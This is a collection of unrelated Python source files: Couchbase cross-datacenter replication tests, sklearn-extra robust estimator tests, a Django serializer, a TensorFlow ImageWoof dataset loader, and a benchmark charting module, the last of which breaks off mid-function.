tasks.append(self.src_cluster.async_query_view(prefix + ddoc_name, view.name, query, src_buckets[0].kvs[1].__len__()))
tasks.append(self.src_cluster.async_query_view(prefix + ddoc_name, view.name, query, dest_buckets[0].kvs[1].__len__()))
for task in tasks:
task.result(self._poll_timeout)
self.verify_results()
finally:
# For timeout error, all tasks to be cancelled
# Before proceeding to next test
for task in tasks:
task.cancel()
"""Replication with disabled/enabled ddoc compaction on both clusters.
This test begins by loading a given number of items on both clusters.
Then we disabled or enabled compaction on both clusters( set via params).
Then we mutate and delete data on clusters 3 times. After deletion we recreate
deleted items. When data was changed 3 times we perform
a full verification: wait for the disk queues to drain
and then verify that there has been no data loss on both clusters."""
def replication_with_disabled_ddoc_compaction(self):
self.setup_xdcr()
self.src_cluster.load_all_buckets(self._num_items)
self.dest_cluster.load_all_buckets(self._num_items)
if "C1" in self._disable_compaction:
self.src_cluster.disable_compaction()
if "C2" in self._disable_compaction:
self.dest_cluster.disable_compaction()
# perform doc's ops 3 times to increase rev number
for _ in range(3):
self.async_perform_update_delete()
# wait till deletes have been sent to recreate
self.sleep(60)
# restore(re-creating) deleted items
if 'C1' in self._del_clusters:
c1_kv_gen = self.src_cluster.get_kv_gen()
c1_gen_delete = copy.deepcopy(c1_kv_gen[OPS.DELETE])
if self._expires:
# if expiration set, recreate those keys before
# trying to update
c1_gen_update = copy.deepcopy(c1_kv_gen[OPS.UPDATE])
self.src_cluster.load_all_buckets_from_generator(kv_gen=c1_gen_update)
self.src_cluster.load_all_buckets_from_generator(kv_gen=c1_gen_delete)
if 'C2' in self._del_clusters:
c2_kv_gen = self.dest_cluster.get_kv_gen()
c2_gen_delete = copy.deepcopy(c2_kv_gen[OPS.DELETE])
if self._expires:
c2_gen_update = copy.deepcopy(c2_kv_gen[OPS.UPDATE])
self.dest_cluster.load_all_buckets_from_generator(kv_gen=c2_gen_update)
self.dest_cluster.load_all_buckets_from_generator(kv_gen=c2_gen_delete)
# wait till we recreate deleted keys before we can delete/update
self.sleep(300)
self.verify_results()
def replication_while_rebooting_a_non_master_src_dest_node(self):
bucket_type = self._input.param("bucket_type", "membase")
if bucket_type == "ephemeral":
self.log.info("Test case does not apply to ephemeral")
return
self.setup_xdcr_and_load()
self.async_perform_update_delete()
self.sleep(self._wait_timeout)
reboot_node_dest = self.dest_cluster.reboot_one_node(self)
NodeHelper.wait_node_restarted(reboot_node_dest, self, wait_time=self._wait_timeout * 4, wait_if_warmup=True)
reboot_node_src = self.src_cluster.reboot_one_node(self)
NodeHelper.wait_node_restarted(reboot_node_src, self, wait_time=self._wait_timeout * 4, wait_if_warmup=True)
self.sleep(120)
ClusterOperationHelper.wait_for_ns_servers_or_assert([reboot_node_dest], self, wait_if_warmup=True)
ClusterOperationHelper.wait_for_ns_servers_or_assert([reboot_node_src], self, wait_if_warmup=True)
self.verify_results()
def test_disk_full(self):
self.setup_xdcr_and_load()
self.verify_results()
self.sleep(self._wait_timeout)
zip_file = "%s.zip" % (self._input.param("file_name", "collectInfo"))
try:
for node in [self.src_master, self.dest_master]:
self.shell = RemoteMachineShellConnection(node)
self.shell.execute_cbcollect_info(zip_file)
if self.shell.extract_remote_info().type.lower() != "windows":
command = "unzip %s" % (zip_file)
output, error = self.shell.execute_command(command)
self.shell.log_command_output(output, error)
if len(error) > 0:
raise Exception("unable to unzip the files. Check unzip command output for help")
cmd = 'grep -R "Approaching full disk warning." cbcollect_info*/'
output, _ = self.shell.execute_command(cmd)
else:
cmd = "curl -0 http://{1}:{2}@{0}:8091/diag 2>/dev/null | grep 'Approaching full disk warning.'".format(
self.src_master.ip,
self.src_master.rest_username,
self.src_master.rest_password)
output, _ = self.shell.execute_command(cmd)
self.assertNotEqual(len(output), 0, "Full disk warning not generated as expected in %s" % node.ip)
self.log.info("Full disk warning generated as expected in %s" % node.ip)
self.shell.delete_files(zip_file)
self.shell.delete_files("cbcollect_info*")
except Exception as e:
self.log.info(e)
def test_rollback(self):
bucket = self.src_cluster.get_buckets()[0]
src_nodes = self.src_cluster.get_nodes()
dest_nodes = self.dest_cluster.get_nodes()
nodes = src_nodes + dest_nodes
# Stop Persistence on Node A & Node B
for node in nodes:
mem_client = MemcachedClientHelper.direct_client(node, bucket)
mem_client.stop_persistence()
goxdcr_log = NodeHelper.get_goxdcr_log_dir(self._input.servers[0])\
+ '/goxdcr.log*'
self.setup_xdcr()
self.src_cluster.pause_all_replications()
self.dest_cluster.pause_all_replications()
gen = BlobGenerator("C1-", "C1-", self._value_size, end=self._num_items)
self.src_cluster.load_all_buckets_from_generator(gen)
gen = BlobGenerator("C2-", "C2-", self._value_size, end=self._num_items)
self.dest_cluster.load_all_buckets_from_generator(gen)
self.src_cluster.resume_all_replications()
self.dest_cluster.resume_all_replications()
# Perform mutations on the bucket
self.async_perform_update_delete()
rest1 = RestConnection(self.src_cluster.get_master_node())
rest2 = RestConnection(self.dest_cluster.get_master_node())
# Fetch count of docs in src and dest cluster
_count1 = rest1.fetch_bucket_stats(bucket=bucket.name)["op"]["samples"]["curr_items"][-1]
_count2 = rest2.fetch_bucket_stats(bucket=bucket.name)["op"]["samples"]["curr_items"][-1]
self.log.info("Before rollback src cluster count = {0} dest cluster count = {1}".format(_count1, _count2))
# Kill memcached on Node A so that Node B becomes master
shell = RemoteMachineShellConnection(self.src_cluster.get_master_node())
shell.kill_memcached()
shell = RemoteMachineShellConnection(self.dest_cluster.get_master_node())
shell.kill_memcached()
# Start persistence on Node B
mem_client = MemcachedClientHelper.direct_client(src_nodes[1], bucket)
mem_client.start_persistence()
mem_client = MemcachedClientHelper.direct_client(dest_nodes[1], bucket)
mem_client.start_persistence()
# Failover Node B
failover_task = self.src_cluster.async_failover()
failover_task.result()
failover_task = self.dest_cluster.async_failover()
failover_task.result()
# Wait for Failover & rollback to complete
self.sleep(60)
# Fetch count of docs in src and dest cluster
_count1 = rest1.fetch_bucket_stats(bucket=bucket.name)["op"]["samples"]["curr_items"][-1]
_count2 = rest2.fetch_bucket_stats(bucket=bucket.name)["op"]["samples"]["curr_items"][-1]
self.log.info("After rollback src cluster count = {0} dest cluster count = {1}".format(_count1, _count2))
self.assertTrue(self.src_cluster.wait_for_outbound_mutations(),
"Mutations in source cluster not replicated to target after rollback")
self.assertTrue(self.dest_cluster.wait_for_outbound_mutations(),
"Mutations in target cluster not replicated to source after rollback")
_, count = NodeHelper.check_goxdcr_log(
src_nodes[0],
"Received rollback from DCP stream",
goxdcr_log)
self.assertGreater(count, 0, "rollback did not happen as expected")
self.log.info("rollback happened as expected")
_, count = NodeHelper.check_goxdcr_log(
dest_nodes[0],
"Received rollback from DCP stream",
goxdcr_log)
self.assertGreater(count, 0, "rollback did not happen as expected")
self.log.info("rollback happened as expected")
def test_scramsha(self):
"""
Creates a new bi-xdcr replication with scram-sha
Make sure to pass use-scramsha=True
from command line
"""
self.setup_xdcr()
self.sleep(60, "wait before checking logs")
for node in [self.src_cluster.get_master_node()]+[self.dest_cluster.get_master_node()]:
_, count = NodeHelper.check_goxdcr_log(node,
"HttpAuthMech=ScramSha for remote cluster reference remoteCluster", timeout=60)
if count <= 0:
self.fail("Node {0} does not use SCRAM-SHA authentication".format(node.ip))
else:
self.log.info("SCRAM-SHA auth successful on node {0}".format(node.ip))
self.verify_results()
def test_update_to_scramsha_auth(self):
"""
Start with ordinary replication, then switch to use scram_sha_auth
Search for success log stmtsS
"""
_, old_count = NodeHelper.check_goxdcr_log(self.src_cluster.get_master_node(),
"HttpAuthMech=ScramSha for remote cluster reference remoteCluster", timeout=60)
self.setup_xdcr()
# modify remote cluster ref to use scramsha
for remote_cluster in self.src_cluster.get_remote_clusters()+self.dest_cluster.get_remote_clusters():
remote_cluster.use_scram_sha_auth()
self.sleep(60, "wait before checking the logs for using scram-sha")
for node in [self.src_cluster.get_master_node()]+[self.dest_cluster.get_master_node()]:
_, count = NodeHelper.check_goxdcr_log(node, "HttpAuthMech=ScramSha for remote cluster reference remoteCluster", timeout=60)
if count <= old_count:
self.fail("Node {0} does not use SCRAM-SHA authentication".format(node.ip))
else:
self.log.info("SCRAM-SHA auth successful on node {0}".format(node.ip))
self.verify_results()
|
1708269
|
from django.conf import settings
from rest_framework import serializers
class SearchHashtagsSerializer(serializers.Serializer):
query = serializers.CharField(max_length=settings.SEARCH_QUERIES_MAX_LENGTH, required=True)
count = serializers.IntegerField(
required=False,
max_value=10
)
|
1708322
|
import numpy as np
import pytest
from sklearn_extra.robust import (
RobustWeightedClassifier,
RobustWeightedRegressor,
RobustWeightedKMeans,
)
from sklearn.datasets import make_blobs
from sklearn.linear_model import SGDClassifier, SGDRegressor, HuberRegressor
from sklearn.cluster import KMeans
from sklearn.utils import shuffle
from sklearn.metrics import r2_score
from sklearn.utils._testing import (
assert_array_almost_equal,
assert_almost_equal,
)
# Test version of sklearn, in version older than v1.0 squared_loss must be used
import sklearn
if sklearn.__version__[0] == "0":
SQ_LOSS = "squared_loss"
else:
SQ_LOSS = "squared_error"
k_values = [None, 10] # values of k for test robust
c_values = [None, 1e-3] # values of c for test robust
# Classification test with outliers
rng = np.random.RandomState(42)
X_cc, y_cc = make_blobs(
n_samples=100,
centers=np.array([[-1, -1], [1, 1]]),
random_state=rng,
)
for f in range(3):
X_cc[f] = [10, 5] + rng.normal(size=2) * 0.1
y_cc[f] = 0
classif_losses = ["log", "hinge"]
weightings = ["huber", "mom"]
multi_class = ["ovr", "ovo"]
def test_robust_estimator_max_iter():
"""Test that warning message is thrown when max_iter is reached."""
model = RobustWeightedClassifier(max_iter=1)
msg = "Maximum number of iteration reached before"
with pytest.warns(UserWarning, match=msg):
model.fit(X_cc, y_cc)
def test_robust_estimator_unsupported_loss():
"""Test that warning message is thrown when unsupported loss."""
model = RobustWeightedClassifier(loss="invalid")
msg = "The loss invalid is not supported. "
with pytest.raises(ValueError, match=msg):
model.fit(X_cc, y_cc)
def test_robust_estimator_unsupported_weighting():
"""Test that warning message is thrown when unsupported weighting."""
model = RobustWeightedClassifier(weighting="invalid")
msg = "No such weighting scheme"
with pytest.raises(ValueError, match=msg):
model.fit(X_cc, y_cc)
def test_robust_estimator_unsupported_multiclass():
"""Test that warning message is thrown when unsupported weighting."""
model = RobustWeightedClassifier(multi_class="invalid")
msg = "No such multiclass method implemented."
with pytest.raises(ValueError, match=msg):
model.fit(X_cc, y_cc)
def test_robust_estimator_input_validation_and_fit_check():
# Invalid parameters
msg = "max_iter must be > 0, got 0."
with pytest.raises(ValueError, match=msg):
RobustWeightedKMeans(max_iter=0).fit(X_cc)
msg = "c must be > 0, got 0."
with pytest.raises(ValueError, match=msg):
RobustWeightedKMeans(c=0).fit(X_cc)
msg = "burn_in must be >= 0, got -1."
with pytest.raises(ValueError, match=msg):
RobustWeightedClassifier(burn_in=-1).fit(X_cc, y_cc)
msg = "eta0 must be > 0, got 0."
with pytest.raises(ValueError, match=msg):
RobustWeightedClassifier(burn_in=1, eta0=0).fit(X_cc, y_cc)
msg = "k must be integer >= 0, and smaller than floor"
with pytest.raises(ValueError, match=msg):
RobustWeightedKMeans(k=-1).fit(X_cc)
@pytest.mark.parametrize("loss", classif_losses)
@pytest.mark.parametrize("weighting", weightings)
@pytest.mark.parametrize("k", k_values)
@pytest.mark.parametrize("c", c_values)
@pytest.mark.parametrize("multi_class", multi_class)
def test_corrupted_classif(loss, weighting, k, c, multi_class):
clf = RobustWeightedClassifier(
loss=loss,
max_iter=100,
weighting=weighting,
k=k,
c=c,
multi_class=multi_class,
random_state=rng,
)
clf.fit(X_cc, y_cc)
score = clf.score(X_cc, y_cc)
assert score > 0.8
# Classification test without outliers
rng = np.random.RandomState(42)
X_c, y_c = make_blobs(
n_samples=100,
centers=np.array([[-1, -1], [1, 1], [3, -1]]),
random_state=rng,
)
# check binary throw an error
def test_robust_estimator_unsupported_loss():
model = RobustWeightedClassifier(multi_class="binary")
msg = "y must be binary."
with pytest.raises(ValueError, match=msg):
model.fit(X_c, y_c)
# Check that the fit is close to SGD when in extremal parameter cases
@pytest.mark.parametrize("loss", classif_losses)
@pytest.mark.parametrize("weighting", weightings)
@pytest.mark.parametrize("multi_class", multi_class)
def test_not_robust_classif(loss, weighting, multi_class):
clf = RobustWeightedClassifier(
loss=loss,
max_iter=100,
weighting=weighting,
k=0,
c=1e7,
burn_in=0,
multi_class=multi_class,
random_state=rng,
)
clf_not_rob = SGDClassifier(loss=loss, random_state=rng)
clf.fit(X_c, y_c)
clf_not_rob.fit(X_c, y_c)
pred1 = clf.predict(X_c)
pred2 = clf_not_rob.predict(X_c)
assert np.mean((pred1 > 0) == (pred2 > 0)) > 0.8
assert clf.score(X_c, y_c) == np.mean(pred1 == y_c)
# Make binary uncorrupted dataset
X_cb, y_cb = make_blobs(
n_samples=100, centers=np.array([[-1, -1], [1, 1]]), random_state=rng
)
@pytest.mark.parametrize("weighting", weightings)
def test_classif_binary(weighting):
clf = RobustWeightedClassifier(
max_iter=100,
weighting=weighting,
k=0,
c=1e7,
burn_in=0,
multi_class="binary",
random_state=rng,
)
clf_not_rob = SGDClassifier(loss="log", random_state=rng)
clf.fit(X_cb, y_cb)
clf_not_rob.fit(X_cb, y_cb)
norm_coef1 = np.linalg.norm(np.hstack([clf.coef_.ravel(), clf.intercept_]))
norm_coef2 = np.linalg.norm(
np.hstack([clf_not_rob.coef_.ravel(), clf_not_rob.intercept_])
)
coef1 = clf.coef_ / norm_coef1
coef2 = clf_not_rob.coef_ / norm_coef2
intercept1 = clf.intercept_ / norm_coef1
intercept2 = clf_not_rob.intercept_ / norm_coef2
assert np.linalg.norm(coef1 - coef2) < 0.5
assert np.linalg.norm(intercept1 - intercept2) < 0.5
assert len(clf.weights_) == len(X_cb)
# Check that weights_ parameter can be used as outlier score.
@pytest.mark.parametrize("weighting", weightings)
def test_classif_corrupted_weights(weighting):
clf = RobustWeightedClassifier(
max_iter=100,
weighting=weighting,
k=5,
c=1,
burn_in=0,
multi_class="binary",
random_state=rng,
)
clf.fit(X_cc, y_cc)
assert np.mean(clf.weights_[:3]) < np.mean(clf.weights_[3:])
# Case "log" loss, test predict_proba
@pytest.mark.parametrize("weighting", weightings)
def test_predict_proba(weighting):
clf = RobustWeightedClassifier(
max_iter=100,
weighting=weighting,
k=0,
c=1e7,
burn_in=0,
random_state=rng,
)
clf_not_rob = SGDClassifier(loss="log", random_state=rng)
clf.fit(X_c, y_c)
clf_not_rob.fit(X_c, y_c)
pred1 = clf.base_estimator_.predict_proba(X_c)[:, 1]
pred2 = clf_not_rob.predict_proba(X_c)[:, 1]
assert np.mean((pred1 > 1 / 2) == (pred2 > 1 / 2)) > 0.8
# check that classifier with another loss than log raises an error
def test_robust_no_proba():
est = RobustWeightedClassifier(loss="hinge").fit(X_c, y_c)
msg = "Probability estimates are not available for loss='hinge'"
with pytest.raises(AttributeError, match=msg):
est.predict_proba(X_c)
# Regression test with outliers
X_rc = rng.uniform(-1, 1, size=[200])
y_rc = X_rc + 0.1 * rng.normal(size=200)
X_rc[0] = 10
X_rc = X_rc.reshape(-1, 1)
y_rc[0] = -1
regression_losses = [SQ_LOSS, "huber"]
@pytest.mark.parametrize("loss", regression_losses)
@pytest.mark.parametrize("weighting", weightings)
@pytest.mark.parametrize("k", k_values)
@pytest.mark.parametrize("c", c_values)
def test_corrupted_regression(loss, weighting, k, c):
reg = RobustWeightedRegressor(
loss=loss,
max_iter=50,
weighting=weighting,
k=k,
c=c,
random_state=rng,
n_iter_no_change=20,
)
reg.fit(X_rc, y_rc)
assert np.abs(reg.coef_[0] - 1) < 0.1
assert np.abs(reg.intercept_[0]) < 0.1
# Check that weights_ parameter can be used as outlier score.
@pytest.mark.parametrize("weighting", weightings)
def test_regression_corrupted_weights(weighting):
reg = RobustWeightedRegressor(
max_iter=100,
weighting=weighting,
k=5,
c=1,
burn_in=0,
random_state=rng,
)
reg.fit(X_rc, y_rc)
assert reg.weights_[0] < np.mean(reg.weights_[1:])
X_r = rng.uniform(-1, 1, size=[1000])
y_r = X_r + 0.1 * rng.normal(size=1000)
X_r = X_r.reshape(-1, 1)
# Check that the fit is close to SGD when in extremal parameter cases
@pytest.mark.parametrize("loss", regression_losses)
@pytest.mark.parametrize("weighting", weightings)
def test_not_robust_regression(loss, weighting):
reg = RobustWeightedRegressor(
loss=loss,
max_iter=100,
weighting=weighting,
k=0,
c=1e7,
burn_in=0,
random_state=rng,
)
reg_not_rob = SGDRegressor(loss=loss, random_state=rng)
reg.fit(X_r, y_r)
reg_not_rob.fit(X_r, y_r)
pred1 = reg.predict(X_r)
pred2 = reg_not_rob.predict(X_r)
difference = [
np.linalg.norm(pred1[i] - pred2[i]) for i in range(len(pred1))
]
assert np.mean(difference) < 1
assert_almost_equal(reg.score(X_r, y_r), r2_score(y_r, reg.predict(X_r)))
# Compare with HuberRegressor on dataset corrupted in y
X_rcy = rng.uniform(-1, 1, size=[200])
y_rcy = X_rcy + 0.1 * rng.normal(size=200)
X_rcy = X_rcy.reshape(-1, 1)
y_rcy[0] = -1
def test_vs_huber():
reg1 = RobustWeightedRegressor(
max_iter=100,
weighting="huber",
k=5,
c=1,
burn_in=0,
sgd_args={"learning_rate": "adaptive"}, # test sgd_args
random_state=rng,
)
reg2 = HuberRegressor()
reg1.fit(X_rcy, y_rcy)
reg2.fit(X_rcy, y_rcy)
assert np.abs(reg1.coef_[0] - reg2.coef_[0]) < 1e-2
# Clustering test with outliers
rng = np.random.RandomState(42)
X_clusterc, y_clusterc = make_blobs(
n_samples=100, centers=np.array([[-1, -1], [1, 1]]), random_state=rng
)
for f in range(3):
X_clusterc[f] = [20, 5] + rng.normal(size=2) * 0.1
y_clusterc[f] = 0
X_cluster, y_cluster = shuffle(X_clusterc, y_clusterc, random_state=rng)
weightings = ["huber", "mom"]
@pytest.mark.parametrize("weighting", weightings)
@pytest.mark.parametrize("k", k_values)
@pytest.mark.parametrize("c", c_values)
def test_corrupted_cluster(weighting, k, c):
km = RobustWeightedKMeans(
n_clusters=2,
max_iter=50,
weighting=weighting,
k=5,
c=None,
random_state=rng,
)
km.fit(X_clusterc)
error = np.mean((km.predict(X_clusterc) - y_clusterc) ** 2)
assert error < 100
# Clustering test without outliers
rng = np.random.RandomState(42)
X_cluster, y_cluster = make_blobs(
n_samples=100, centers=np.array([[-1, -1], [1, 1]]), random_state=rng
)
# Check that the fit is close to KMeans when in extremal parameter cases
@pytest.mark.parametrize("weighting", weightings)
def test_not_robust_cluster(weighting):
clf = RobustWeightedKMeans(
n_clusters=2,
max_iter=100,
weighting=weighting,
k=0,
c=1e7,
random_state=rng,
)
clf_not_rob = KMeans(2, random_state=rng)
clf.fit(X_cluster)
clf_not_rob.fit(X_cluster)
pred1 = [clf.cluster_centers_[i] for i in clf.predict(X_cluster)]
pred2 = [
clf_not_rob.cluster_centers_[i] for i in clf_not_rob.predict(X_cluster)
]
difference = [
np.linalg.norm(pred1[i] - pred2[i]) for i in range(len(pred1))
]
assert np.mean(difference) < 1
def test_transform():
n_clusters = 2
km = RobustWeightedKMeans(n_clusters=n_clusters, random_state=rng)
km.fit(X_cluster)
X_new = km.transform(km.cluster_centers_)
for c in range(n_clusters):
assert X_new[c, c] == 0
for c2 in range(n_clusters):
if c != c2:
assert X_new[c, c2] > 0
def test_fit_transform():
X1 = (
RobustWeightedKMeans(n_clusters=2, random_state=42)
.fit(X_cluster)
.transform(X_cluster)
)
X2 = RobustWeightedKMeans(n_clusters=2, random_state=42).fit_transform(
X_cluster
)
assert_array_almost_equal(X1, X2)
|
1708330
|
from io import StringIO
from snowfakery.data_generator import generate
class TestFriends:
def test_multiple_friends(self, generated_rows):
yaml = """
- object: Account
- object: Account
friends:
- object: Contact
fields:
AccountId:
reference: Account
- object: Contact
fields:
AccountId:
reference: Account
"""
generate(StringIO(yaml), {})
assert generated_rows.table_values("Contact", 0, "AccountId") == "Account(2)"
assert generated_rows.table_values("Contact", 1, "AccountId") == "Account(2)"
|
1708368
|
from __future__ import absolute_import, division, print_function, unicode_literals
import os
import pathlib
import typing
from typing import TYPE_CHECKING
import numpy as np
if TYPE_CHECKING: # pragma: no cover
import tensorflow as _tf
try:
import tensorflow as tf
assert tf.__version__[:2] == "2."
except ImportError:
raise ImportError(
'Das Dataset erfordert tensorflow 2! Lokal geht das mit "conda install tensorflow>=2.0.0" oder "pip install tensorflow>=2.0.0"'
)
except AssertionError:
raise ImportError(
'Das Dataset erfordert tensorflow 2! In Colab kannst du dies mit dem "%tensorflow_version 2.x" Befehl erzwingen. Anschliessend musst du die Runtime restarten. Schaue dir dazu am Besten nochmal die Beispiel Notebooks aus dieser Woche an!'
)
AUTOTUNE = tf.data.experimental.AUTOTUNE
"""
The imagewoof dataset is provided by FastAI
author = "<NAME>",
title = "imagenette",
url = "https://github.com/fastai/imagenette/"
"""
ImageWoofType = typing.TypeVar("ImageWoofType", bound="ImageWoof")
class ImageWoof:
BATCH_SIZE: int = 32
CLASS_NAMES: np.ndarray = None
data_dir: pathlib.Path
image_count: int = 0
list_ds: "_tf.data.Dataset" = None
def __init__(self, dataset: str) -> None:
if dataset not in ["train", "val"]:
raise ValueError("Dataset not found")
file_path = tf.keras.utils.get_file(
origin="https://s3.amazonaws.com/fast-ai-imageclas/imagewoof2-320.tgz",
fname="imagewoof",
untar=True,
)
self.data_dir = pathlib.Path(file_path + "2-320/" + dataset)
print(self.data_dir)
self.image_count = len(list(self.data_dir.glob("*/*.JPEG")))
print(f"Loaded {self.image_count} images")
self.raw_class_names = [
item.name for item in self.data_dir.glob("*") if item.name != "LICENSE.txt"
]
self.raw_class_names.sort()
self.class_name_mapping = dict(
n02096294="Australian terrier",
n02093754="Border terrier",
n02111889="Samoyed",
n02088364="Beagle",
n02086240="Shih-Tzu",
n02089973="English foxhound",
n02087394="Rhodesian ridgeback",
n02115641="Dingo",
n02099601="Golden retriever",
n02105641="Old English sheepdog",
)
self.CLASS_NAMES = np.array([self.map_class(c) for c in self.raw_class_names])
self.list_ds = tf.data.Dataset.list_files(str(self.data_dir / "*/*"))
@classmethod
def train(cls: typing.Type[ImageWoofType]) -> ImageWoofType:
return cls("train")
@classmethod
def validation(cls: typing.Type[ImageWoofType]) -> ImageWoofType:
return cls("val")
def map_class(self, raw_cls: str) -> str:
return self.class_name_mapping[raw_cls]
def get_label(self, file_path: str) -> "_tf.Tensor":
# convert the path to a list of path components
parts = tf.strings.split(file_path, os.path.sep)
# The second to last is the class-directory
label = parts[-2] == self.raw_class_names
label = tf.reduce_sum(tf.where(label))
return label
def decode_img(self, img: "_tf.Tensor") -> "_tf.Tensor":
# convert the compressed string to a 3D uint8 tensor
img = tf.image.decode_jpeg(img, channels=3)
# Use `convert_image_dtype` to convert to floats in the [0,1] range.
return tf.image.convert_image_dtype(img, tf.float32)
def process_path(self, file_path: str) -> typing.Tuple["_tf.Tensor", str]:
label = self.get_label(file_path)
# load the raw data from the file as a string
img: "_tf.Tensor" = tf.io.read_file(file_path)
img = self.decode_img(img)
return img, label
def wrapped_load_data(self) -> "_tf.data.Dataset":
return self.list_ds.map(self.process_path, num_parallel_calls=AUTOTUNE)
@classmethod
def load_data(
cls: typing.Type[ImageWoofType],
) -> typing.Tuple["_tf.data.Dataset", "_tf.data.Dataset", np.ndarray]:
train_ds = cls.train()
return (
train_ds.wrapped_load_data(),
cls.validation().wrapped_load_data(),
train_ds.CLASS_NAMES,
)
|
1708378
|
import numpy as np
from mcfly.models.base_hyperparameter_generator import generate_base_hyperparameter_set, \
get_regularization
def test_regularization_is_float():
""" Regularization should be a float. """
reg = get_regularization(0, 5)
assert isinstance(reg, np.float), "Expected different type."
def test_regularization_0size_interval():
""" Regularization from zero size interval [2,2] should be 10^-2. """
reg = get_regularization(2, 2)
assert reg == 0.01
def test_base_hyper_parameters_reg():
""" Base hyper parameter set should contain regularization. """
hyper_parameter_set = generate_base_hyperparameter_set(low_lr=1,
high_lr=4,
low_reg=1,
high_reg=3)
assert 'regularization_rate' in hyper_parameter_set.keys()
|
1708456
|
import os
import sys
import re
import operator
import json
from commands import getoutput
from collections import defaultdict
import py
from dotmap import DotMap
import pygal
try:
# see GroupedBarChart.get_point for why it's needed
import scipy
except ImportError:
scipy = None
class SecondsFormatter(pygal.formatters.HumanReadable):
def __call__(self, val):
val = super(SecondsFormatter, self).__call__(val)
if not val[-1].isdigit():
val = val[:-1] + ' ' + val[-1]
return val + 's'
def format_point(b, point):
rev = b.info.commit_info.id
url = 'https://github.com/antocuni/capnpy/commit/%s' % rev
point.update({
'label': '%s %s' % (b.name, rev[:7]),
'xlink': {
'href': url,
'target': '_blank'
}
})
return point
class GroupedBarChart(object):
"""
Helper class to build a pygal Bar chart with groups.
Each data point has two property:
- series_name: each series gets a different color and it's shown in the
legend
- group: the bars belonging to each group are located together, and the
name of the group is shown on the X axis
"""
def __init__(self, title):
self.title = title
self.all_series = set()
self.all_groups = set()
self.data = {} # [(series_name, group)] -> point
def get_point(self, b):
point = {'value': b.stats.mean}
if scipy:
# scipy is needed to compute confidence intervals; however, if
# it's not installed we don't want pygal to crash.
point['ci'] = {
'type': 'continuous',
'sample_size': b.stats.rounds,
'stddev': b.stats.stddev
}
return format_point(b, point)
def add(self, series_name, group, b):
self.all_series.add(series_name)
self.all_groups.add(group)
key = (series_name, group)
if key in self.data:
raise ValueError("Duplicate key: %s" % (key,))
self.data[(series_name, group)] = self.get_point(b)
def build(self):
chart = pygal.Bar(pretty_print=True)
chart.config.value_formatter = SecondsFormatter()
chart.y_title = 'Time'
chart.title = self.title
series_names = sorted(self.all_series)
groups = sorted(self.all_groups)
chart.x_labels = groups
for name in series_names:
series = [self.data.get((name, group), None)
for group in groups]
chart.add(name, series)
return chart
class TimelineChart(object):
def __init__(self, title):
self.title = title
self.data = defaultdict(dict)
self.min = float('inf')
self.max = float('-inf')
self.all_revisions = []
def get_point(self, b):
point = {'value': b.stats.min}
return format_point(b, point)
def add(self, series_name, group, b):
assert group is None
rev = b.info.commit_info.id
if rev not in self.all_revisions:
# XXX: to get correct results, we need that all_revisions contains
# the commits in the correct order. Here, we are relying on the
# fact that we sort() the json files before loading them, so .add
# will see the revisions in chronological order. Probably, it
# would be better to do a proper topological sort of revisions
# without relying on the order of json loading
self.all_revisions.append(rev)
p = self.get_point(b)
self.data[series_name][rev] = p
self.min = min(self.min, p['value'])
self.max = max(self.max, p['value'])
def build(self):
chart = pygal.Line()
chart.title = self.title
chart.config.value_formatter = SecondsFormatter()
chart.y_title = 'Time'
for name, rev2point in self.data.iteritems():
points = [rev2point.get(rev) for rev in self.all_revisions]
chart.add(name, points)
#
#
# XXX: the old list benchmarks were so slow that make the Y axis of
# this benchmark so compressed that it's impossible to spot
# variations. So, we manually set the range to something which is
# "reasonable" at the time of writing :(
if self.title == 'Constructors [CPython]':
self.max = 0.027
# try to compute a reasonable Y scale;
chart.min_scale = 10 # make sure to have 10 horizontal bands
estimate_max = self.min*2 # min+10% will cross one horizontal band
estimate_max = max(self.max, estimate_max)
if estimate_max != float('inf'):
chart.range = [0, estimate_max]
return chart
def display(chart):
# for development
if isinstance(chart, GroupedBarChart):
chart = chart.build()
chart.render_to_png('/tmp/chart.png')
os.system('feh /tmp/chart.png')
class PyQuery(list):
"""
Extend a list with an API which is vaguely inspired by jQuery to filter
and interact with the data.
"""
def filter(self, predicate):
new_items = [item for item in self if predicate(item)]
return self.__class__(new_items)
def getattr(self, attr, strict=False):
getter = operator.attrgetter(attr)
new_items = []
for item in self:
try:
new_items.append(getter(item))
except (AttributeError, KeyError):
if strict:
raise
pass
return self.__class__(new_items)
def __getattr__(self, attr):
return self.getattr(attr, strict=True)
def __call__(self, *args, **kwds):
return self.__class__([item(*args, **kwds) for item in self])
def pp(self):
from pprint import pprint
for item in self:
if isinstance(item, DotMap):
item.pprint()
else:
pprint(item)
class Charter(object):
"""
Chart-maker --> Charter :)
"""
def __init__(self, dir, revision):
self.dir = dir
self.revision = revision
self.clone_maybe()
self.load_all()
def clone_maybe(self):
# clone the .benchmarks repo, if it's needed
if self.dir.check(exists=False):
print 'Cloning the benchmarks repo'
url = getoutput('git config remote.origin.url')
cmd = 'git clone --depth=1 --branch=benchmarks {url} {dir}'
ret = os.system(cmd.format(url=url, dir=self.dir))
assert ret == 0
def files_to_load(self, limit):
result = []
for subdir in self.dir.listdir():
if subdir.check(dir=False):
continue
files = sorted(subdir.listdir('*.json'))
result += files[-limit:]
return result
def load_all(self, limit=50):
# load all benchmarks. We only take the latest 50 because else the
# charts are too dense, and the readthedocs build timeouts
self.all = PyQuery()
for f in self.files_to_load(limit):
self.all += self.load_one(f)
#
# filter a subset containing only the results for the current revision
self.latest_warning = None
self.latest = self.all.filter(
lambda b: b.info.commit_info.id == self.revision)
if not self.latest:
self.latest_warning = ('WARNING: rev %s not found, using latest '
'data' % self.revision[:6])
print self.latest_warning
# no benchmarks found for the current revision. This is likely to
# happen on the development machine; in this case, we simply take
# the newest benchmarks, regardless of the revision
self.latest = PyQuery()
all_impls = set(self.all.info.machine_info.python_implementation)
for impl in all_impls:
subset = self.all.filter(
lambda b: b.info.machine_info.python_implementation == impl)
newest_datetime = max(subset.info.datetime)
self.latest += subset.filter(
lambda b: b.info.datetime == newest_datetime)
@classmethod
def load_one(cls, f):
s = f.read()
if s == '':
return []
d = json.loads(s)
info = DotMap(d, _dynamic=False)
#
# reverse the relationship between info and benchmarks: each benchmark
# has a pointer to the info (which has no longer a list of benhmarks)
benchmarks = info.pop('benchmarks')
for b in benchmarks:
b.filename = str(f)
b.info = info
# just a shortcut
b.python_implementation = b.info.machine_info.python_implementation
return benchmarks
@classmethod
def extract_test_name(cls, name):
m = re.match(r'test_([^\[]+)(\[.*\])?', name)
assert m
return m.group(1)
def get_chart(self, timeline, benchmarks, title, filter, series, group):
